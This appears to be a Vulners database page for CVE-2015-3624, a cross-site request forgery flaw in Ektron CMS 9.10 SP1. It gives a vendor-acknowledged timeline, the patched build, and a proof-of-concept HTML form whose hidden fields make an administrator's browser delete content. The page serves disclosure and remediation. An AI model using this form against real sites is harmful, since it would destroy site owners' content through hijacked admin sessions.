Vulners
Lucene search
Ektron CMS 9.10 SP1 (Build 9.1.0.184.1.114) - Cross-Site Request Forgery
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | Ektron CMS 9.10 SP1 (Build 9.1.0.184.1.114) - CSRF Vulnerability | 16 Jun 201500:00 | – | zdt |
 | Ektron Cross-Site Request Forgery Vulnerability | 9 Jun 201500:00 | – | cnvd |
 | CVE-2015-3624 | 9 Jun 201514:00 | – | cve |
 | CVE-2015-3624 | 9 Jun 201514:00 | – | cvelist |
 | EUVD-2015-3666 | 7 Oct 202500:30 | – | euvd |
| EUVD-2015-4447 | 7 Oct 202500:30 | – | euvd |
 | Ektron CMS 9.10 SP1 (Build 9.1.0.184.1.114) - Cross-Site Request Forgery | 16 Jun 201500:00 | – | exploitpack |
 | CVE-2015-3624 | 9 Jun 201514:59 | – | nvd |
 | Ektron CMS 9.10 SP1 Cross Site Request Forgery | 31 May 201500:00 | – | packetstorm |
 | Cross site request forgery (csrf) | 9 Jun 201514:59 | – | prion |
10
# Vulnerability type: Cross-site Request Forgery
# Vendor: http://www.ektron.com/
# Product: Ektron Content Management System
# Affected version: =< 9.10 SP1 (Build 9.1.0.184.1.114)
# Patched version: 9.10 SP1 (Build 9.1.0.184.1.120)
# CVE ID: CVE-2015-3624
# Credit: Jerold Hoong
# PROOF OF CONCEPT (CSRF)
Cross-site request forgery (CSRF) vulnerability in MenuActions.aspx in Ektron CMS 9.10
SP1 before build 9.1.0.184.1.120 allows remote attackers to hijack the authentication
of content administrators for requests that could lead to the deletion of content and
assets.
<html>
<body>
<form action="http://127.0.0.1/Test/WorkArea/DmsMenu/menuActions/MenuActions.aspx">
<input type="hidden" name="action" value="delete" />
<input type="hidden" name="contentId" value="4210" />
<input type="hidden" name="LangType" value="1033" />
<input type="hidden" name="folderId" value="561" />
<input type="hidden" name="redirectBack" value="true" />
<input type="hidden" name="menuType" value="Workarea" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
# TIMELINE
– 07/04/2015: Vulnerability found
– 07/04/2015: Vendor informed
– 08/04/2015: Vendor responded and acknowledged
- 01/05/2015: MITRE issued CVE number CVE-2015-3624
– 28/05/2015: Vendor fixed the issue
– 31/05/2015: Public disclosureData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Jun 2015 00:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 25.8
EPSS0.00751